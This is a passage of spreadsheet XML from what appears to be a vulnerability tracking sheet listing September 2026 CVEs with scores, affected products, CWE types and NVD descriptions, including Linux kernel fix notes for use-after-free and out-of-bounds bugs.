        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr"/>
      <c r="Q308" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R308"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08" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75862</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75863</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr"/>
      <c r="Q309" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R309"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09" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75863</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77091</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr"/>
      <c r="Q310" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>DataCube contained a path traversal issue affecting security feature enforcement. Software customers upgrade to resolved maintenance release. Update Content Extractor and Index Store.</t>
        </is>
      </c>
      <c r="S310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77091</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77489</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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11" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr"/>
      <c r="Q311" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77904</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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12" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr"/>
      <c r="Q312" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78484</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr"/>
      <c r="Q313" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R313"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S313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78484</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78493</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr"/>
      <c r="Q314" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R314"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S314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78493</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80075</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr"/>
      <c r="Q315" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80178</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr"/>
      <c r="Q316" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Privilege Management vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="S316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80178</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80928</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr"/>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smack: fix cred UAF in smack_file_send_sigiotask()
When inspecting the credentials of another task, objective credentials
(-&gt;real_cred, accessed with __task_cred()) must always be used.
Accessing -&gt;cred on a non-current task is forbidden unless that task is
being created or destroyed; a task is allowed to change its own -&gt;cred
pointer with no synchronization, and changing -&gt;cred should only affect the
current syscall.
smack_file_send_sigiotask() was accessing both sets of credentials: First
tsk-&gt;cred, then __task_cred(tsk).
Fix it, always access the objective credentials here.
I have tested that this bug can lead to a KASAN-reported UAF of struct cred
in smack_file_send_sigiotask(), and that this fix prevents the race.</t>
        </is>
      </c>
      <c r="S317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80928</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80929</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr"/>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sysctl: move the "cad_pid" entry from pid_table[] to kern_reboot_table[]
cad_pid is global, and kill_cad_pid() is only used in the root namespace.
However, due to pid_table_root_permissions(), a non-root user can unshare
pid/user namespaces and modify it from the child namespace. This makes no
sense and is simply wrong.
Move it to kern_reboot_table[] where it logically belongs; this ensures
that only GLOBAL_ROOT_UID can read/modify this sysctl.
Note that this patch doesn't preserve "#ifdef CONFIG_PROC_SYSCTL" around
the "cad_pid"; CONFIG_PROC_SYSCTL selects CONFIG_SYSCTL, so it is always
set when kern_reboot_table[] is compiled.</t>
        </is>
      </c>
      <c r="S318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80929</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80931</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr"/>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
w1: ds28e17: reject an oversize length on an I2C block read
w1_f19_i2c_master_transfer() is the master_xfer for the DS28E17 1-Wire
to I2C bridge. On an I2C_M_RECV_LEN read, it takes the length from the
device. The downstream slave puts a length byte in buf[0]. The driver
then reads that many bytes into buf[1] with w1_f19_i2c_read().
buf[0] is controlled by the device and can be 0 to 255.
w1_f19_i2c_read() only rejects a zero count. The caller buffer is
I2C_SMBUS_BLOCK_MAX + 2, so 34 bytes. A length above 32 makes the read
run past it, up to about 222 bytes out of bounds.
The SMBus core does check buf[0] against I2C_SMBUS_BLOCK_MAX. That
check runs after master_xfer returns. By then the write is already
done. i2c-algo-bit rejects an oversize length before it copies, and
returns -EPROTO.
Reject a length above I2C_SMBUS_BLOCK_MAX at both RECV_LEN sites, the
same way i2c-algo-bit does.</t>
        </is>
      </c>
      <c r="S319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80931</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80933</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr"/>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: validate default EEPROM firmware size
The default EEPROM firmware is parsed and copied as a full EEPROM
without checking its length. A truncated file can make the driver
read beyond the firmware buffer during variant validation or the
fallback copy.
Reject files shorter than MT7996_EEPROM_SIZE before parsing or
copying the firmware.</t>
        </is>
      </c>
      <c r="S320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80933</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80936</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr"/>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7925: cancel mlo_pm_work on stop
mt7925 queues mlo_pm_work with a 5 second delay during multi-link
power-save setup and never cancels it on the stop path. If the device is
torn down inside that window, the work outlives the teardown and its timer
fires afterwards, trying to queue onto the workqueue that is already gone:
  workqueue: cannot queue mt7925_mlo_pm_work [mt7925_common] on wq phy0
  WARNING: kernel/workqueue.c:2283 at __queue_work+0x59/0xa0, CPU#1: swapper/1/0
   call_timer_fn+0x2a/0x140
   __run_timers+0x203/0x330
   run_timer_softirq+0x86/0xf0
mt7921 already has its own stop callback, so add one for mt7925 that
cancels the work before calling mt792x_stop(). mt7925_ops backs both the
PCIe and USB drivers, so this covers both.</t>
        </is>
      </c>
      <c r="S321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80936</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80944</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr"/>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mwifiex: Detach sync cmd buffer on interrupted wait
mwifiex synchronous commands keep the caller-provided data buffer in
cmd_node-&gt;data_buf. Several callers pass stack-allocated objects there.
If wait_event_interruptible_timeout() is interrupted, the caller can
return and release that stack object while the firmware command is still
the current command. A late firmware response then reaches the normal
response handler, which can copy data through cmd_node-&gt;data_buf into the
stale stack address.
This fixes a stack corruption observed during repeated association and
disassociation cycles. The panic trace showed the command wait being
interrupted immediately before a bad pointer dereference:
  cmd_wait_q terminated: -512
  Unable to handle kernel paging request at virtual address 002c583837384662
  Kernel panic - not syncing: stack-protector: Kernel stack is corrupted
  ...
  Tainted: [M]=MACHINE_CHECK
The fault address decodes as little-endian ASCII:
  0x002c583837384662 -&gt; "bF878X,\0"
which is a fragment of the VERSION_EXT firmware string exposed as
debugfs "verext":
  w8997o-V4, RF878X, FP92, 16.92.21.p153.7
The same runs also showed corrupted control data containing:
  0x2400372e333531 -&gt; "153.7\0$"
which is the tail of the same VERSION_EXT string. This points at a late
VERSION_EXT response writing through a stale stack-backed data_buf after
the interrupted wait returned.
After cancelling pending commands on an interrupted or timed-out wait,
detach the caller-owned data buffer from the still-current command. This
preserves the existing command cancellation behaviour while preventing a
late response from writing through a pointer whose lifetime ended with the
waiting caller.
Tested on an i.MX8MP board using an 88W8997.</t>
        </is>
      </c>
      <c r="S322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80944</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80947</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr"/>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: rtl8xxxu: fix use-after-free from rx_urb_wq on stop
rtl8xxxu arms rx_urb_wq from the RX completion path:
rtl8xxxu_rx_complete() hands the URB to rtl8xxxu_queue_rx_urb(), which
queues it on rx_urb_pending_list and, once the list grows past
RTL8XXXU_RX_URB_PENDING_WATER, schedules rx_urb_wq.  The worker
rtl8xxxu_rx_urb_work() drains rx_urb_pending_list, recovers priv through
container_of, and resubmits each URB through rtl8xxxu_submit_rx_urb(),
which anchors it on rx_anchor and dereferences priv-&gt;udev.
rtl8xxxu_stop() cancels the sibling work items (c2hcmd_work, ra_watchdog,
update_beacon_work) but never cancels rx_urb_wq, so a worker armed during
the last burst of RX traffic can run rtl8xxxu_rx_urb_work() after
rtl8xxxu_disconnect() has called ieee80211_free_hw(), which frees priv,
producing a use-after-free.  The window opens under active RX traffic
(pending count above the watermark) followed by a disconnect.
There are two teardown races to close:
  * rtl8xxxu_queue_rx_urb() decided whether to enqueue under rx_urb_lock
    but called schedule_work() after dropping the lock.  A completion
    that observed shutdown == false and released the lock could then call
    schedule_work() after rtl8xxxu_stop() had set shutdown and
    cancel_work_sync() had already returned, arming the worker to run
    after the teardown.  Move schedule_work() under the same !shutdown
    branch so the arming decision is atomic with the shutdown check.
  * rtl8xxxu_rx_urb_work() anchors every URB it drained back onto
